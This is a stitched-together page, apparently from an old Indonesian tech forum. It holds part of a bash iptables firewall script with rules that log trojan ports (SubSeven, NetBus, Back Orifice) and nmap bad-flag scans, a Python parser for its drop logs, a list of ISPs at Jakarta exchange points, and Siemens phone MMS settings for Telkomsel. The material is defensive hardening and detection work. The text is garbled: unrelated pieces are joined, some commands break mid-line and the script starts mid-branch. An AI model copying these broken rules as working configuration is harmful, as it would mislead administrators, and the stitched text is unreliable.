INTIP="`ifconfig $INTIF | grep inet | cut -d : -f 2 | cut -d ' ' -f 1`"
if [ "$INTIP" = '' ]; then
echo "Aborting: Unable to determine the IP-address of $INTIF !"
exit 1
fi
echo Internal IP: $INTIP
## Determine internal netmask
INTMASK="`ifconfig $INTIF | grep Mask | cut -d : -f 4`"
echo Internal Netmask: $INTMASK
## Determine network address of the internal network
INTLAN=$INTIP'/'$INTMASK
echo Internal LAN: $INTLAN
echo ""
#----Load IPTABLES-modules-----#
#Insert modules- should be done automatically if needed
#If the IRC-modules are available, uncomment them below
echo "Loading IPTABLES modules"
dmesg -n 1 #Kill copyright display on module load
/sbin/modprobe ip_tables
/sbin/modprobe iptable_filter
/sbin/modprobe ip_conntrack
/sbin/modprobe ip_conntrack_ftp
/sbin/modprobe ip_nat_ftp
#/sbin/modprobe ip_conntrack_irc ports=$IRCPORTS
#/sbin/modprobe ip_nat_irc ports=$IRCPORTS
dmesg -n 6
echo " --- "
#----Clear/Reset all chains-----#
#Clear all IPTABLES-chains
#Flush everything, start from scratch
$IPTABLES -F
$IPTABLES -F -t mangle
$IPTABLES -F -t nat
$IPTABLES -X
$IPTABLES -X -t mangle
$IPTABLES -X -t nat
#Set default policies to DROP
$IPTABLES -P INPUT DROP
$IPTABLES -P OUTPUT DROP
$IPTABLES -P FORWARD DROP
#----Set network sysctl options-----#
echo "Setting sysctl options"
#Enable forwarding in kernel
echo 1 > /proc/sys/net/ipv4/ip_forward
#Disabling IP Spoofing attacks.
echo 2 > /proc/sys/net/ipv4/conf/all/rp_filter
#Don't respond to broadcast pings (Smurf-Amplifier-Protection)
echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
#Block source routing
echo 0 > /proc/sys/net/ipv4/conf/all/accept_source_route
#Kill timestamps
echo 0 > /proc/sys/net/ipv4/tcp_timestamps
#Enable SYN Cookies
echo 1 > /proc/sys/net/ipv4/tcp_syncookies
#Kill redirects
echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects
#Enable bad error message protection
echo 1 > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses
#Log martians (packets with impossible addresses)
echo 1 > /proc/sys/net/ipv4/conf/all/log_martians
#Set out local port range
echo "32768 61000" > /proc/sys/net/ipv4/ip_local_port_range
#Reduce DoS'ing ability by reducing timeouts
echo 30 > /proc/sys/net/ipv4/tcp_fin_timeout
echo 2400 > /proc/sys/net/ipv4/tcp_keepalive_time
echo 0 > /proc/sys/net/ipv4/tcp_window_scaling
echo 0 > /proc/sys/net/ipv4/tcp_sack
echo " --- "
echo "Creating user-chains"
#----Create logging chains-----#
##These are the logging-chains. They all have a certain limit of log-entries/sec to prevent logflooding
##The syslog-entries will be fireparse-compatible (see http://www.fireparse.com)
#Invalid packets (not ESTABLISHED,RELATED or NEW)
$IPTABLES -N LINVALID
$IPTABLES -A LINVALID -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --log-prefix "fp=INVALID:1 a=DROP "
$IPTABLES -A LINVALID -j DROP
#TCP-Packets with one or more bad flags
$IPTABLES -N LBADFLAG
$IPTABLES -A LBADFLAG -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --log-prefix "fp=BADFLAG:1 a=DROP "
$IPTABLES -A LBADFLAG -j DROP
#Logging of connection attempts on special ports (Trojan portscans, special services, etc.)
$IPTABLES -N LSPECIALPORT
$IPTABLES -A LSPECIALPORT -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --log-prefix "fp=SPECIALPORT:1 a=DROP "
$IPTABLES -A LSPECIALPORT -j DROP
#Logging of possible TCP-SYN-Floods
$IPTABLES -N LSYNFLOOD
$IPTABLES -A LSYNFLOOD -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --log-prefix "fp=SYNFLOOD:1 a=DROP "
$IPTABLES -A LSYNFLOOD -j DROP
#Logging of possible Ping-Floods
$IPTABLES -N LPINGFLOOD
$IPTABLES -A LPINGFLOOD -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --log-prefix "fp=PINGFLOOD:1 a=DROP "
$IPTABLES -A LPINGFLOOD -j DROP
#All other dropped packets
$IPTABLES -N LDROP
$IPTABLES -A LDROP -p tcp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --log-prefix "fp=TCP:1 a=DROP "
$IPTABLES -A LDROP -p udp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --log-prefix "fp=UDP:2 a=D
ROP "
$IPTABLES -A LDROP -p icmp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --log-prefix "fp=ICMP:3 a=DROP "
$IPTABLES -A LDROP -f -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --log-prefix "fp=FRAGMENT:4 a=DROP "
$IPTABLES -A LDROP -j DROP
#All other rejected packets
$IPTABLES -N LREJECT
$IPTABLES -A LREJECT -p tcp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --log-prefix "fp=TCP:1 a=REJECT "
$IPTABLES -A LREJECT -p udp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --log-prefix "fp=UDP:2 a=REJECT "
$IPTABLES -A LREJECT -p icmp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --log-prefix "fp=ICMP:3 a=REJECT "
$IPTABLES -A LREJECT -f -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --log-prefix "fp=FRAGMENT:4 a=REJECT "
$IPTABLES -A LREJECT -p tcp -j REJECT --reject-with tcp-reset
$IPTABLES -A LREJECT -p udp -j REJECT --reject-with icmp-port-unreachable
$IPTABLES -A LREJECT -j REJECT
#----Create Accept-Chains-----#
#TCPACCEPT - Check for SYN-Floods before letting TCP-Packets in
$IPTABLES -N TCPACCEPT
$IPTABLES -A TCPACCEPT -p tcp --syn -m limit --limit $TCPSYNLIMIT --limit-burst
$TCPSYNLIMITBURST -j ACCEPT
$IPTABLES -A TCPACCEPT -p tcp --syn -j LSYNFLOOD
$IPTABLES -A TCPACCEPT -p tcp ! --syn -j ACCEPT
#----Create special User-Chains-----#
#CHECKBADFLAG - Kill any Inbound/Outbound TCP-Packets with impossible flag-combinations
(Some port-scanners use these, eg. nmap Xmas,Null,etc.-scan)
$IPTABLES -N CHECKBADFLAG
$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags ALL FIN,URG,PSH -j LBADFLAG
$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j LBADFLAG
$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags ALL ALL -j LBADFLAG
$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags ALL NONE -j LBADFLAG
$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags SYN,RST SYN,RST -j LBADFLAG
$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags SYN,FIN SYN,FIN -j LBADFLAG
#FILTERING FOR SPECIAL PORTS
#Inbound/Outbound SILENTDROPS/REJECTS (Things we don´t want in our Logs)
#SMB-Traffic
$IPTABLES -N SMB
$IPTABLES -A SMB -p tcp --dport 137 -j DROP
$IPTABLES -A SMB -p tcp --dport 138 -j DROP
$IPTABLES -A SMB -p tcp --dport 139 -j DROP
$IPTABLES -A SMB -p tcp --dport 445 -j DROP
$IPTABLES -A SMB -p udp --dport 137 -j DROP
$IPTABLES -A SMB -p udp --dport 138 -j DROP
$IPTABLES -A SMB -p udp --dport 139 -j DROP
$IPTABLES -A SMB -p udp --dport 445 -j DROP
$IPTABLES -A SMB -p tcp --sport 137 -j DROP
$IPTABLES -A SMB -p tcp --sport 138 -j DROP
$IPTABLES -A SMB -p tcp --sport 139 -j DROP
$IPTABLES -A SMB -p tcp --sport 445 -j DROP
$IPTABLES -A SMB -p udp --sport 137 -j DROP
$IPTABLES -A SMB -p udp --sport 138 -j DROP
$IPTABLES -A SMB -p udp --sport 139 -j DROP
$IPTABLES -A SMB -p udp --sport 445 -j DROP
#Inbound Special Ports
$IPTABLES -N SPECIALPORTS
#Deepthroat Scan
$IPTABLES -A SPECIALPORTS -p tcp --dport 6670 -j LSPECIALPORT
#Subseven Scan
$IPTABLES -A SPECIALPORTS -p tcp --dport 1243 -j LSPECIALPORT
$IPTABLES -A SPECIALPORTS -p udp --dport 1243 -j LSPECIALPORT
$IPTABLES -A SPECIALPORTS -p tcp --dport 27374 -j LSPECIALPORT
$IPTABLES -A SPECIALPORTS -p udp --dport 27374 -j LSPECIALPORT
$IPTABLES -A SPECIALPORTS -p tcp --dport 6711:6713 -j LSPECIALPORT
#Netbus Scan
$IPTABLES -A SPECIALPORTS -p tcp --dport 12345:12346 -j LSPECIALPORT
$IPTABLES -A SPECIALPORTS -p tcp --dport 20034 -j LSPECIALPORT
#Back Orifice scan
$IPTABLES -A SPECIALPORTS -p udp --dport 31337:31338 -j LSPECIALPORT
#X-Win
$IPTABLES -A SPECIALPORTS -p tcp --dport $XWINPORTS -j LSPECIALPORT
#Hack´a´Tack 2000
$IPTABLES -A SPECIALPORTS -p udp --dport 28431 -j LSPECIALPORT
#ICMP/TRACEROUTE FILTERING
#Inbound ICMP/Traceroute
$IPTABLES -N ICMPINBOUND
#Ping Flood protection. Accept $PINGLIMIT echo-requests/sec, rest will be logged/dropped
$IPTABLES -A ICMPINBOUND -p icmp --icmp-type echo-request -m limit --limit $PINGLIMIT --
limit-burst $PINGLIMITBURST -j ACCEPT
#
$IPTABLES -A ICMPINBOUND -p icmp --icmp-type echo-request -j LPINGFLOOD
#Block ICMP-Redirects (Should already be catched by sysctl-options, if enabled)
$IPTABLES -A ICMPINBOUND -p icmp --icmp-type redirect -j LDROP
#Block ICMP-Timestamp (Should already be catched by sysctl-options, if enabled)
$IPTABLES -A ICMPINBOUND -p icmp --icmp-type timestamp-request -j LDROP
$IPTABLES -A ICMPINBOUND -p icmp --icmp-type timestamp-reply -j LDROP
#Block ICMP-address-mask (can help to prevent OS-fingerprinting)
$IPTABLES -A ICMPINBOUND -p icmp --icmp-type address-mask-request -j LDROP
$IPTABLES -A ICMPINBOUND -p icmp --icmp-type address-mask-reply -j LDROP
#Allow all other ICMP in
$IPTABLES -A ICMPINBOUND -p icmp -j ACCEPT
#Outbound ICMP/Traceroute
$IPTABLES -N ICMPOUTBOUND
#Block ICMP-Redirects (Should already be catched by sysctl-options, if enabled)
$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type redirect -j LDROP
#Block ICMP-TTL-Expired
#MS Traceroute (MS uses ICMP instead of UDp for tracert)
$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type ttl-zero-during-transit -j LDROP
$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type ttl-zero-during-reassembly -j LDROP
#Block ICMP-Parameter-Problem
$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type parameter-problem -j LDROP
#Block ICMP-Timestamp (Should already be catched by sysctl-options, if enabled)
$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type timestamp-request -j LDROP
$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type timestamp-reply -j LDROP
#Block ICMP-address-mask (can help to prevent OS-fingerprinting)
$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type address-mask-request -j LDROP
$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type address-mask-reply -j LDROP
##Accept all other ICMP going out
$IPTABLES -A ICMPOUTBOUND -p icmp -j ACCEPT
#----End User-Chains-----#
echo " --- "
#----Start Ruleset-----#
echo "Implementing firewall rules..."
#################
## INPUT-Chain ## (everything that is addressed to the firewall itself)
#################
##GENERAL Filtering
# Kill INVALID packets (not ESTABLISHED, RELATED or NEW)
$IPTABLES -A INPUT -m state --state INVALID -j LINVALID
# Check TCP-Packets for Bad Flags
$IPTABLES -A INPUT -p tcp -j CHECKBADFLAG
##Packets FROM FIREWALL-BOX ITSELF
#Local IF
$IPTABLES -A INPUT -i lo -j ACCEPT
#
#Kill connections to the local interface from the outside world (--> Should be already catched by
kernel/rp_filter)
$IPTABLES -A INPUT -d 127.0.0.0/8 -j LREJECT
##Packets FROM INTERNAL NET
##Allow unlimited traffic from internal network using legit addresses to firewall-box
##If protection from the internal interface is needed, alter it
$IPTABLES -A INPUT -i $INTIF -s $INTLAN -j ACCEPT
#Kill anything from outside claiming to be from internal network (Address-Spoofing --> Should be
already catched by rp_filter)
$IPTABLES -A INPUT -s $INTLAN -j LREJECT
##Packets FROM EXTERNAL NET
##ICMP & Traceroute filtering
#Filter ICMP
$IPTABLES -A INPUT -i $EXTIF -p icmp -j ICMPINBOUND
#Block UDP-Traceroute
$IPTABLES -A INPUT -p udp --dport 33434:33523 -j LDROP
##Silent Drops/Rejects (Things we don´t want in our logs)
#Drop all SMB-Traffic
$IPTABLES -A INPUT -i $EXTIF -j SMB
#Silently reject Ident (Don´t DROP ident, because of possible delays when establishing an
outbound connection)
$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 113 -j REJECT --reject-with tcp-reset
##Public services running ON FIREWALL-BOX (comment out to activate):
# ftp-data
$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 20 -j TCPACCEPT
# ftp
$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 21 -j TCPACCEPT
# ssh
$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 22 -j TCPACCEPT
#telnet
#$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 23 -j TCPACCEPT
# smtp
$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 25 -j TCPACCEPT
# DNS
$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 53 -j TCPACCEPT
$IPTABLES -A INPUT -i $EXTIF -p udp --dport 53 -j ACCEPT
# http
$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 80 -j TCPACCEPT
# https
$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 443 -j TCPACCEPT
# POP-3
$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 110 -j TCPACCEPT
#SQUID
$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 3128 -j TCPACCEPT
$IPTABLES -t nat -A PREROUTING -i $EXTIF -p tcp --dport 80 -j REDIRECT --to-port 3128
##Separate logging of special portscans/connection attempts
$IPTABLES -A INPUT -i $EXTIF -j SPECIALPORTS
##Allow ESTABLISHED/RELATED connections in
$IPTABLES -A INPUT -i $EXTIF -m state --state ESTABLISHED -j ACCEPT
$IPTABLES -A INPUT -i $EXTIF -p tcp --dport $UNPRIVPORTS -m state --state RELATED -j
TCPACCEPT
$IPTABLES -A INPUT -i $EXTIF -p udp --dport $UNPRIVPORTS -m state --state RELATED -j
ACCEPT
##Catch all rule
$IPTABLES -A INPUT -j LDROP
##################
## Output-Chain ## (everything that comes directly from the Firewall-Box)
##################
##Packets TO FIREWALL-BOX ITSELF
#Local IF
$IPTABLES -A OUTPUT -o lo -j ACCEPT
##Packets TO INTERNAL NET
#Allow unlimited traffic to internal network using legit addresses
$IPTABLES -A OUTPUT -o $INTIF -d $INTLAN -j ACCEPT
##Packets TO EXTERNAL NET
##ICMP & Traceroute
$IPTABLES -A OUTPUT -o $EXTIF -p icmp -j ICMPOUTBOUND
##Silent Drops/Rejects (Things we don´t want in our logs)
#SMB
$IPTABLES -A OUTPUT -o $EXTIF -j SMB
#Ident
$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 113 -j REJECT --reject-with tcp-reset
##Public services running ON FIREWALL-BOX (comment out to activate):
# ftp-data
#$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 20 -j ACCEPT
# ftp
#$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 21 -j ACCEPT
# ssh
$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT
#telnet
$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 23 -m state --state ESTABLISHED -j ACCEPT
# smtp
$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 25 -m state --state ESTABLISHED -j ACCEPT
# DNS
$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 53 -j ACCEPT
$IPTABLES -A OUTPUT -o $EXTIF -p udp --sport 53 -j ACCEPT
# http
$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
# https
$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 443 -m state --state ESTABLISHED -j ACCEPT
# POP-3
$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 110 -m state --state ESTABLISHED -j ACCEPT
# Squid
$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 3128 -m state --state ESTABLISHED -j
ACCEPT
##Accept all tcp/udp traffic on unprivileged ports going out
$IPTABLES -A OUTPUT -o $EXTIF -s $EXTIP -p tcp --sport $UNPRIVPORTS -j ACCEPT
$IPTABLES -A OUTPUT -o $EXTIF -s $EXTIP -p udp --sport $UNPRIVPORTS -j ACCEPT
##Catch all rule
$IPTABLES -A OUTPUT -j LDROP
####################
## FORWARD-Chain ## (everything that passes the firewall)
####################
##GENERAL Filtering
#Kill invalid packets (not ESTABLISHED, RELATED or NEW)
$IPTABLES -A FORWARD -m state --state INVALID -j LINVALID
# Check TCP-Packets for Bad Flags
$IPTABLES -A FORWARD -p tcp -j CHECKBADFLAG
##Filtering FROM INTERNAL NET
##Silent Drops/Rejects (Things we don´t want in our logs)
#SMB
$IPTABLES -A FORWARD -o $EXTIF -j SMB
##Special Drops/Rejects
# - To be done -
##Filter for some Trojans communicating to outside
# - To be done -
##Port-Forwarding from Ports < 1024 [outbound] (--> Also see chain PREROUTING)
#HTTP-Forwarding
#$IPTABLES -A FORWARD -o $EXTIF -s $HTTPIP -p tcp --sport 80 -j ACCEPT
##Allow all other forwarding (from Ports > 1024) from Internal Net to External Net
$IPTABLES -A FORWARD -i $INTIF -o $EXTIF -s $INTLAN -p tcp --sport $UNPRIVPORTS -j
ACCEPT
$IPTABLES -A FORWARD -i $INTIF -o $EXTIF -s $INTLAN -p udp --sport $UNPRIVPORTS -j
ACCEPT
$IPTABLES -A FORWARD -i $INTIF -o $EXTIF -s $INTLAN -p icmp -j ACCEPT
##Filtering FROM EXTERNAL NET
##Silent Drops/Rejects (Things we don´t want in our logs)
#SMB
$IPTABLES -A FORWARD -i $EXTIF -j SMB
##Allow replies coming in
$IPTABLES -A FORWARD -i $EXTIF -m state --state ESTABLISHED -j ACCEPT
$IPTABLES -A FORWARD -i $EXTIF -p tcp --dport $UNPRIVPORTS -m state --state RELATED
-j TCPACCEPT
$IPTABLES -A FORWARD -i $EXTIF -p udp --dport $UNPRIVPORTS -m state --state RELATED
-j ACCEPT
$IPTABLES -A FORWARD -i $EXTIF -p icmp -m state --state RELATED -j ACCEPT
##Port-Forwarding [inbound] (--> Also see chain PREROUTING)
#HTTP-Forwarding
#$IPTABLES -A FORWARD -i $EXTIF -p tcp -d $HTTPIP --dport 80 -j ACCEPT
#Battlecom-Forwarding
#$IPTABLES -A FORWARD -p tcp --dport 2300:2400 -i $EXTIF -d $BATTLECOMIP -j ACCEPT
#$IPTABLES -A FORWARD -p udp --dport 2300:2400 -i $EXTIF -d $BATTLECOMIP -j ACCEPT
#$IPTABLES -A FORWARD -p tcp --dport 47624 -i $EXTIF -d $BATTLECOMIP -j ACCEPT
##Catch all rule/Deny every other forwarding
$IPTABLES -A FORWARD -j LDROP
################
## PREROUTING ##
################
##Port-Forwarding (--> Also see chain FORWARD)
##HTTP
#$IPTABLES -A PREROUTING -t nat -i $EXTIF -p tcp -d $EXTIP --dport 80 -j DNAT --to
$HTTPIP
##Battlecom
#$IPTABLES -t nat -A PREROUTING -d $EXTIP -p tcp --destination-port 2300:2400 -i $EXTIF -j
DNAT --to $BATTLECOMIP
#$IPTABLES -t nat -A PREROUTING -d $EXTIP -p udp --destination-port 2300:2400 -i $EXTIF -j
DNAT --to $BATTLECOMIP
#$IPTABLES -t nat -A PREROUTING -d $EXTIP -p tcp --destination-port 47624 -i $EXTIF -j
DNAT --to $BATTLECOMIP:47624
###################
## POSTROUTING ##
###################
#Masquerade from Internal Net to External Net
$IPTABLES -A POSTROUTING -t nat -o $EXTIF -j MASQUERADE
#------End Ruleset------#
echo "...done"
echo ""
echo "--> IPTABLES firewall loaded/activated <--"
##--------------------------------End Firewall---------------------------------##
;;
*)
echo "Usage: firewall (start|stop|restart|status) EXTIF INTIF"
exit 1
esac
exit 0
Addendum
#############
# Transparent proxy: redirect the LAN's HTTP requests arriving on the internal interface (eth1 here) to Squid on port 3128
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 80 -j REDIRECT --to-port 3128
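Every packet the logging chains above drop or reject lands in syslog with a fireparse-style prefix (fp=<category>:<n> a=<action>) followed by the kernel LOG target's IN=/SRC=/DPT= fields, which is what makes the output machine-readable. The Python below is an added example, not part of the original script or of fireparse, that parses such lines, counts hits per category and per source address, lists the SPECIALPORT ports each source probed (the trojan-scan signature the SPECIALPORTS chain exists for), and names the flag combination behind a BADFLAG entry the same way the CHECKBADFLAG rules do. The sample log lines are constructed (documentation addresses, invented timestamps) so it runs offline.

```python
import re
from collections import Counter, defaultdict

# Constructed sample syslog lines (not from a real host), in the format the kernel LOG
# target emits for the "fp=<CATEGORY>:<n> a=<ACTION> " prefixes used by the chains above.
SAMPLE_LOG = """\
Oct 26 07:57:01 fw kernel: fp=SPECIALPORT:1 a=DROP IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.5 DST=198.51.100.1 LEN=48 TOS=0x00 PREC=0x00 TTL=115 ID=12345 DF PROTO=TCP SPT=4431 DPT=27374 WINDOW=16384 RES=0x00 SYN URGP=0
Oct 26 07:57:02 fw kernel: fp=SPECIALPORT:1 a=DROP IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.5 DST=198.51.100.1 LEN=48 TOS=0x00 PREC=0x00 TTL=115 ID=12346 DF PROTO=TCP SPT=4432 DPT=12345 WINDOW=16384 RES=0x00 SYN URGP=0
Oct 26 07:57:03 fw kernel: fp=BADFLAG:1 a=DROP IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.5 DST=198.51.100.1 LEN=40 TOS=0x00 PREC=0x00 TTL=48 ID=777 PROTO=TCP SPT=55555 DPT=22 WINDOW=1024 RES=0x00 URG PSH FIN URGP=0
Oct 26 07:57:04 fw kernel: fp=UDP:2 a=DROP IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=192.0.2.77 DST=198.51.100.1 LEN=60 TOS=0x00 PREC=0x00 TTL=57 ID=1 PROTO=UDP SPT=40123 DPT=33437 LEN=40
Oct 26 07:57:05 fw kernel: fp=TCP:1 a=REJECT IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=192.168.1.10 DST=198.51.100.1 LEN=48 TOS=0x00 PREC=0x00 TTL=57 ID=2 DF PROTO=TCP SPT=1025 DPT=22 WINDOW=8192 RES=0x00 SYN URGP=0
Oct 26 07:57:06 fw sshd[123]: Accepted publickey for admin from 192.168.1.5 port 50000 ssh2
"""

TCP_FLAGS = {"CWR", "ECE", "URG", "ACK", "PSH", "RST", "SYN", "FIN"}

LOG_RE = re.compile(
    r"kernel: fp=(?P<category>[A-Z]+):(?P<code>\d+) a=(?P<action>DROP|REJECT) (?P<fields>.*)$"
)


def parse_line(line):
    """Parse one fireparse-prefixed LOG line into a dict; return None for unrelated syslog lines.

    KEY=VALUE tokens become dict entries (a repeated key, such as the second LEN= of a UDP
    packet, overwrites the first); bare TCP flag names are collected under 'tcp_flags'.
    IP-level flags such as DF are ignored.
    """
    m = LOG_RE.search(line)
    if m is None:
        return None
    rec = {"category": m.group("category"), "code": int(m.group("code")),
           "action": m.group("action"), "tcp_flags": []}
    for tok in m.group("fields").split():
        if "=" in tok:
            key, value = tok.split("=", 1)
            rec[key] = value
        elif tok in TCP_FLAGS:
            rec["tcp_flags"].append(tok)
    return rec


def badflag_kind(tcp_flags):
    """Name the impossible flag combination, mirroring the CHECKBADFLAG rules."""
    f = set(tcp_flags)
    if f == {"URG", "PSH", "FIN"}:
        return "xmas"
    if not f:
        return "null"
    if {"SYN", "FIN"} <= f:
        return "syn-fin"
    if {"SYN", "RST"} <= f:
        return "syn-rst"
    return "other"


def summarize(log_text):
    """Count packets per (category, action) and per source, and collect the destination
    ports each source hit in the SPECIALPORT chain."""
    by_category = Counter()
    by_source = Counter()
    special_ports = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        by_category[(rec["category"], rec["action"])] += 1
        by_source[rec.get("SRC", "?")] += 1
        if rec["category"] == "SPECIALPORT" and "DPT" in rec:
            special_ports[rec["SRC"]].add(int(rec["DPT"]))
    return by_category, by_source, special_ports


if __name__ == "__main__":
    cats, srcs, ports = summarize(SAMPLE_LOG)
    for (cat, act), n in sorted(cats.items()):
        print(f"{cat}:{act} {n}")
    for src, n in srcs.most_common():
        print(f"{src} {n} packets, special ports probed: {sorted(ports.get(src, []))}")
```

Because the LOG target is rate-limited by $LOGLIMIT, the counts are a lower bound on what actually hit the chain; for a full count read the packet counters of the chains themselves (iptables -L -v -n).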
GCC (Telkom Building) IIX-JKT1
ISP AS Number Connection
- AccessNet AS 7587 Ethernet
- RadNet AS 4434 Ethernet
- Centrin AS 9326 Ethernet
- Mahatel AS 7083 Ethernet
- Idola AS 4800 Ethernet

Napinfo (Kuningan) IIX-JKT3
ISP AS Number Connection
- Napinfo AS 17727 FastEther
- Inter.net AS 18103 FastEther
- Asianet AS 10114 FastEther
- Orbicom AS 23948 FastEther
- Radnet AS 4434 FastEther

IDC (Cyber Building) IIX-JKT2
ISP AS Number Connection
- Jasatel AS 9785 FastEther
- Starcall AS 9251 FastEther
- Nusanet AS 23679 FastEther
- Thamrin AS 23952 FastEther
- Mitranet AS 23691 FastEther
- IconPLN AS 9341 FastEther
- VIPnet AS 23698 FastEther
- Napsindo AS 17907 FastEther
- The.Net AS 10208 FastEther
- Gen.ID AS 23950 FastEther
- GerbangNet AS 18251 FastEther
- Elga AS 23695 FastEther
- FirstAsia AS 23696 FastEther
- EzyNet AS 18056 FastEther
- BNA AS 18189 FastEther
- TripleGate AS 17910 FastEther
- CSM AS 18379 FastEther
- Padinet AS 23756 FastEther
- Reach AS 4637 FastEther
- Uninet AS 17884 FastEther
- SatNet AS 17826 FastEther
- Multidata AS 18153 FastEther
- Melsa.net AS 9657 FastEther
- KSNet AS 18112 FastEther
- JavaNet AS 18393 FastEther
- IptekNet AS 3583 FastEther
- SpeedNet AS 9251 FastEther
- Patrakom AS 10137 FastEther
- Angkasa AS 17450 FastEther
- Solusi AS 17995 FastEther
- GPNet AS 18394 FastEther
- SpotNet AS 4833 FastEther
- Jogjamedianet AS 23671 FastEther
- IPnet AS 18347 FastEther
- Rainbow AS 23945 FastEther
- Central AS 9228 FastEther
- Exelcom AS 17885 FastEther
- UIInet AS 17996 FastEther
- BizNet AS 17451 FastEther
- Indika AS 23694 FastEther
- Quasar AS 18364 FastEther
- Eranet AS 17440 FastEther
- Easynet AS 23651 FastEther
- TopNet AS 23946 FastEther
- LinkNet AS 9905 FastEther
- InfoAsia AS 10220 FastEther
- Indonet AS 9340 FastEther
- CBN AS 4787 FastEther
- Indosat AS 4795 FastEther
- Visionnet AS 18237 FastEther
- Dnet AS 9794 FastEther
- Idola AS 4800 FastEther
- KadinNet Static FastEther
- Jalawave AS 23697 FastEther
- PSN AS 9875 FastEther
- Jetscom AS 17671 FastEther
- Infokom AS 17670 FastEther
- Bolehnet AS 9462 FastEther
- DTP AS 18059 FastEther
- Kabelvision AS 23700 FastEther
- NTT Indonesia AS 10217 FastEther
- Satelindo AS 17922 FastEther
- Okenet AS 4832 FastEther
- TelkomNet AS 17974 FastEther
- PacificNet AS 4855 FastEther
- Infonet AS 2008 FastEther
- Asiakomnet AS 18052 FastEther
- Commercenet Static FastEther
- JII AS 17800 FastEther
- NAP Info AS 17727 FastEther
- AsiaNet AS 10114 FastEther
- Inter.net AS 18103 FastEther
- CityNet AS 17769 FastEther
- Radnet AS 4434 FastEther
- Centrin AS 9326 FastEther
- Bitnet AS 18156 FastEther
- IPTK AS 23699 FastEther
- Telkomsel AS 23693 FastEther
- Estiko AS 23692 Serial
- Qita Static Serial
- Sistelindo AS 2687 Serial
- PrimaNet AS 17658 Serial
- Internux Static Serial
- Teras AS 4821 Serial
- Circlecom AS 17538 Serial
Post by : No_Name on [ 26 October 2005 07:57:07 ]
GPRS settings
Manual MMS-over-GPRS settings for Telkomsel
Manual MMS-over-GPRS settings for Telkomsel on the Siemens A65, CF62, C60, M55, MC60, S55, SL55
Step 1: Create the GPRS setting
1. Press Menu
2. Select Setup
3. Select Connectivity
4. Select GPRS and tick it (√)
5. Select Data Services
6. Select MMS, WAP
7. Select
7a. Rename it:
- Press Option
- Press Rename
- Enter: MMS Telkomsel
- Press Save
7b. Press Edit, then press Yes
8. Select GPRS Settings
8a. Tick (√) GPRS Settings
8b. Select Edit
9. Fill in the following parameters:
- APN: mms
- Login: wap
- Password: wap123
10. Press Save
11. Continue with step 2
Step 2: MMS settings
1. Press Menu
2. Select Message
3. Select Msg. setup
4. Select MMS profiles
5. Select MMS or another free slot.
5a. Rename it:
- Press Options
- Press Rename
- Enter: MMS Telkomsel
- Press OK
5b. Press Options, then press Change sett.
6. Fill in the following parameters:
- Expiry time: Maximum
- Def. Priority: Normal
